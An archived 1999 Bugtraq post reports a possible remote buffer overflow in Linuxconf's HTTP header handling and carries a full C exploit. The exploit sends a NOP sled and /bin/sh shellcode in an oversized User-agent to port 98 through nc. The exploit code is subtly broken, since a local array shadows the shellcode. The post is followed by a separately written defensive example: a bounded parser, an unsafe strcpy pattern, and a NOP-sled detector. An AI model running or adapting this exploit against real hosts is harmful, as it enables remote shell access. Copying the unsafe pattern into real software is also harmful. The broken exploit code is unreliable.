Bugtraq mailing list archives
(Possible) Linuxconf Remote Buffer Overflow Vulnerability
From: aleph1 () SECURITYFOCUS COM (Elias Levy)
Date: Tue, 21 Dec 1999 10:31:14 -0800
There may exist a buffer overflow vulnerability in the Linuxconf package shipped with some versions of Linux systems. The vulnerability may be in the program's handling of HTTP headers. Initial testing with Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If others can test the exploit and report their results, it would be appreciated.

This is an example of what good can happen from sharing security incident information. There have been reports in the INCIDENTS mailing list for several months now of scans for port 98. Since no publicly known major vulnerabilities existed in this service, the traffic was somewhat strange. After some digging around, Jon Starnaud <jon.starnaud () rci com> was able to find this exploit. If you are not subscribed to INCIDENTS and wish to share incident information, I suggest you sign up. If the vulnerability does exist, this would be the second vulnerability we discover thanks to sharing incident information (the first one being sadmind).

http://www.securityfocus.com/forums/incidents/faq.html

/*
   linuxconf exploit by R00T-X (c) 1999
   USER_AGENT overflow x86
   should work on all linux's but you need to have network access to linuxconf

   greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P

   have fun with this but for EDUCATIONAL PURPOSES :)

   Usage: (./linexp <offset>;cat)| nc targethost 98
*/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 1025
#define NOP 0x90

char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
    "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
    "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xe8\xc0\xff\xff\xff/bin/sh\x00";

void main (int argc, char *argv[])
{
    char buf[BUFLEN];
    int offset, nop, i;
    unsigned long esp;
    char shell[1024+300];

    if (argc < 2) {
        fprintf(stderr, "usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);
        exit(0);
    }

    nop = 511;
    esp = 0xefbfd5e8;
    offset = atoi(argv[1]);

    memset(buf, NOP, BUFLEN);
    memcpy(buf + (long) nop, shell, strlen(shell));

    for (i = 256; i < BUFLEN - 3; i += 2) {
        *((int *) &buf[i]) = esp + (long) offset;
        shell[sizeof(shell) - 1] = 0;
    }

    printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);
    for (i = 0; i < BUFLEN; i++)
        putchar(buf[i]);
    printf("\r\n");
    return;
}

--
Elias Levy
Security Focus
http://www.securityfocus.com/
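The post suspects a fixed-size buffer in Linuxconf's HTTP header handling, and the payload it carries is a 1025-byte User-agent value consisting mostly of 0x90 bytes. The following is an added example, not code from the post or from Linuxconf, showing the defensive side of that: a bounded header parser that rejects (rather than truncates) a value that will not fit, placed next to the unbounded copy pattern it replaces, plus the detection heuristic a network monitor would apply to port 98 traffic (longest run of 0x90 bytes in a request). The MAX_HEADER_VALUE limit, the function names and the sample requests are assumptions constructed for this example; the samples contain only NOP bytes, no shellcode.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Largest header value the hypothetical server accepts. Assumed value,
 * chosen well below the 1025-byte User-agent the posted exploit sends. */
#define MAX_HEADER_VALUE 256

/* Unbounded copy pattern (illustrative, never called): a fixed buffer
 * filled with strcpy(), so any value longer than 64 bytes writes past
 * its end. This is the class of defect the post suspects. */
void copy_header_unsafe(const char *value, char dst[64])
{
    strcpy(dst, value);
}

/* Case-insensitive test that `line` starts with "<name>:". */
static int header_name_matches(const char *line, const char *name)
{
    size_t n = strlen(name);
    for (size_t i = 0; i < n; i++) {
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)name[i]))
            return 0;          /* also stops at '\0' or '\r' in `line` */
    }
    return line[n] == ':';
}

/* Bounded parser: copies the value of header `name` from `request` into
 * `out` (capacity `outlen`). Returns the value length, -1 if the header
 * is absent, or -2 if the value would not fit. An oversized value is
 * rejected outright, never truncated, so the caller cannot silently
 * process a clipped payload. */
int get_header_value(const char *request, const char *name,
                     char *out, size_t outlen)
{
    const char *line = strstr(request, "\r\n");   /* skip request line */
    if (!line) return -1;
    line += 2;
    while (*line && strncmp(line, "\r\n", 2) != 0) {
        const char *eol = strstr(line, "\r\n");
        size_t linelen = eol ? (size_t)(eol - line) : strlen(line);
        if (header_name_matches(line, name)) {
            const char *v = line + strlen(name) + 1;
            while (v < line + linelen && (*v == ' ' || *v == '\t')) v++;
            size_t vlen = (size_t)(line + linelen - v);
            if (vlen + 1 > outlen) return -2;     /* bound check first */
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        if (!eol) break;
        line = eol + 2;
    }
    return -1;
}

/* Detection heuristic: longest run of 0x90 (x86 NOP) bytes in a raw
 * request. The posted payload is a long NOP sled, which ordinary HTTP
 * traffic to a Linuxconf port never contains. */
size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (buf[i] == 0x90) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* Constructed sample: a POST in the shape of the exploit's output, with
 * a User-agent of `ua_len` NOP bytes. Returns total length, 0 on error. */
size_t build_sample_request(char *dst, size_t cap, size_t ua_len)
{
    int n = snprintf(dst, cap, "POST / HTTP/1.0\r\nContent-Length: %zu\r\nUser-agent: ", ua_len);
    if (n < 0 || (size_t)n + ua_len + 5 > cap) return 0;
    memset(dst + n, 0x90, ua_len);
    memcpy(dst + n + ua_len, "\r\n\r\n", 5);       /* copies the NUL too */
    return (size_t)n + ua_len + 4;
}

/* Parser verdict for a sample with a `ua_len`-byte User-agent. */
int classify_sample(size_t ua_len)
{
    static char req[4096];
    char value[MAX_HEADER_VALUE];
    if (build_sample_request(req, sizeof req, ua_len) == 0) return -3;
    return get_header_value(req, "user-agent", value, sizeof value);
}

/* NOP-sled length seen by the detector for the same sample. */
size_t sample_nop_run(size_t ua_len)
{
    static char req[4096];
    size_t len = build_sample_request(req, sizeof req, ua_len);
    return longest_nop_run((const unsigned char *)req, len);
}

/* Parses a benign constructed request; returns 5 only if the value
 * round-trips exactly as "probe". */
int normal_request_check(void)
{
    char out[32];
    const char *req = "GET / HTTP/1.0\r\nHost: example.test\r\nUser-Agent: probe\r\n\r\n";
    int n = get_header_value(req, "user-agent", out, sizeof out);
    return (n == 5 && strcmp(out, "probe") == 0) ? 5 : -9;
}

int main(void)
{
    printf("benign request: %d\n", normal_request_check());
    printf("20-byte UA: %d, 1025-byte UA: %d (-2 = rejected)\n",
           classify_sample(20), classify_sample(1025));
    printf("NOP run in 1025-byte sample: %zu\n", sample_nop_run(1025));
    return 0;
}
```

The parser checks the bound before touching the destination, which is the single property the suspected Linuxconf code would lack; the detector is a coarse heuristic and would be one signal among others (port 98 connections from unexpected sources, oversized headers) rather than a rule on its own.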